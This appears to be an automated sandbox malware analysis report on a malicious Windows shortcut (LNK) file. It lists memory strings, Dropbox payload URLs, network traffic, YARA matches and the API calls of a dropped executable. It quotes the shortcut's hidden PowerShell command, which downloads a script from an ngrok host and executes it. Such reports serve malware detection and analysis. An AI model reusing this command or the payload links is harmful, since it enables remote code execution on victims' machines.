                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B004B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/j
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B012D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD84395000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/ptzcgw4lpru9m0531rddz/secure.txt?rlkey=m4b7p25r8ky8361o8wsoc61f9&dl=1
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B012D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
                    Source: powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
                    Source: powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownHTTPS traffic detected: 3.125.209.94:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49706 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.65.15:443 -> 192.168.2.5:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.5:49739 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49773 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49811 version: TLS 1.2
                    Source: 111392827.exe, 00000018.00000003.2639140917.0000000002D80000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_4366f925-1
                    Source: 111392827.exe, 00000018.00000003.2639140917.0000000002D80000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_62a4e576-f
                    Source: Yara matchFile source: 25.3.fontdrvhost.exe.53e0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 24.3.111392827.exe.2fa0000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.3.fontdrvhost.exe.5600000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 24.3.111392827.exe.2d80000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000018.00000003.2639140917.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000003.2639519078.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.2646521849.0000000005600000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000003.2645361356.00000000053E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 111392827.exe PID: 9612, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 9640, type: MEMORYSTR

                    System Summary

                    barindex
                    Drops large PE files
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeFile dump: PerfectouinVans.exe.22.dr 979567347Jump to dropped file
                    Powershell drops PE file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\111392827.exeJump to dropped file
                    Windows shortcut file (LNK) contains suspicious command line arguments
                    Source: qxjDerXRGR.lnkLNK file: /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00447F20 NtQueryDefaultLocale,22_2_00447F20
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00448357 NtQueryDefaultLocale,22_2_00448357
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00447BED NtQueryDefaultLocale,22_2_00447BED
                    Source: C:\Windows\System32\fontdrvhost.exeCode function: 29_2_00000202B2F51CF4 NtAcceptConnectPort,CloseHandle,29_2_00000202B2F51CF4
                    Source: C:\Windows\System32\fontdrvhost.exeCode function: 29_2_00000202B2F515C0 NtAcceptConnectPort,29_2_00000202B2F515C0
                    Source: C:\Windows\System32\fontdrvhost.exeCode function: 29_2_00000202B2F51AA4 NtAcceptConnectPort,NtAcceptConnectPort,29_2_00000202B2F51AA4
                    Source: C:\Windows\System32\fontdrvhost.exeCode function: 29_2_00000202B2F50AC8 NtAcceptConnectPort,NtAcceptConnectPort,29_2_00000202B2F50AC8
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00460070: DeviceIoControl,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,22_2_00460070
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0041E0F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,22_2_0041E0F0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0041E0F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,24_2_0041E0F0
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0044F92B22_2_0044F92B
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00438BE122_2_00438BE1
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00447F2022_2_00447F20
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0043814522_2_00438145
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0043911022_2_00439110
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0044835722_2_00448357
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0043430E22_2_0043430E
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0044744122_2_00447441
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0044F4E422_2_0044F4E4
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0043557E22_2_0043557E
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0044B58322_2_0044B583
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0044D58E22_2_0044D58E
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0044059422_2_00440594
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0044E62C22_2_0044E62C
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0044B63022_2_0044B630
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004476E722_2_004476E7
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004406A222_2_004406A2
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0043876622_2_00438766
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0043877922_2_00438779
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004357EA22_2_004357EA
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0044E95A22_2_0044E95A
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0044190322_2_00441903
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004579F022_2_004579F0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0041FAB022_2_0041FAB0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00434B5622_2_00434B56
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00434B6322_2_00434B63
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00435B7122_2_00435B71
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00434B3022_2_00434B30
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00447BED22_2_00447BED
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00435B8D22_2_00435B8D
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0044CC6D22_2_0044CC6D
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00435C7F22_2_00435C7F
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00435C8422_2_00435C84
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00434DB022_2_00434DB0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0044EE4722_2_0044EE47
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0050DE5C22_2_0050DE5C
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00436E5E22_2_00436E5E
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0044EE0222_2_0044EE02
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00436E3622_2_00436E36
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00436ED822_2_00436ED8
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00435F0122_2_00435F01
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00461F1022_2_00461F10
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00468F8022_2_00468F80
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00435F8B22_2_00435F8B
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0044EFA922_2_0044EFA9
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_006081D224_3_006081D2
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_005FC23124_3_005FC231
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_005FC40024_3_005FC400
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0043430E24_2_0043430E
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0043985D24_2_0043985D
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_004579F024_2_004579F0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0041FAB024_2_0041FAB0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00435B7124_2_00435B71
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00435B8D24_2_00435B8D
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00435C7F24_2_00435C7F
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00435C8424_2_00435C84
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00435F0124_2_00435F01
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00461F1024_2_00461F10
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00468F8024_2_00468F80
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00435F8B24_2_00435F8B
                    Source: C:\Windows\System32\fontdrvhost.exeCode function: 29_2_00000202B2F50C7029_2_00000202B2F50C70
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: String function: 00474096 appears 394 times
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: String function: 005FCD90 appears 33 times
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: String function: 0040AC20 appears 40 times
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: String function: 0041AD60 appears 40 times
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: String function: 0042A940 appears 54 times
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: String function: 0044E7B0 appears 44 times
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: String function: 0040AB60 appears 34 times
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 9612 -s 472
                    Source: classification engineClassification label: mal100.troj.evad.winLNK@82/287@21/13
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0041E0F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,22_2_0041E0F0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00419CF0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,22_2_00419CF0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00419D90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,CloseHandle,22_2_00419D90
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0041E0F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,24_2_0041E0F0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00419CF0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,24_2_00419CF0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_00419D90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,CloseHandle,24_2_00419D90
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00463750 GetDiskFreeSpaceW,22_2_00463750
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004197C0 LoadBitmapW,CoInitialize,CoCreateInstance,CoUninitialize,CoSetProxyBlanket,CoUninitialize,CoUninitialize,VariantInit,VariantClear,VariantClear,VariantClear,CoUninitialize,22_2_004197C0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0041B4B0 OpenSCManagerW,OpenServiceW,CloseServiceHandle,QueryServiceStatus,QueryServiceStatus,ControlService,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceW,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,22_2_0041B4B0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
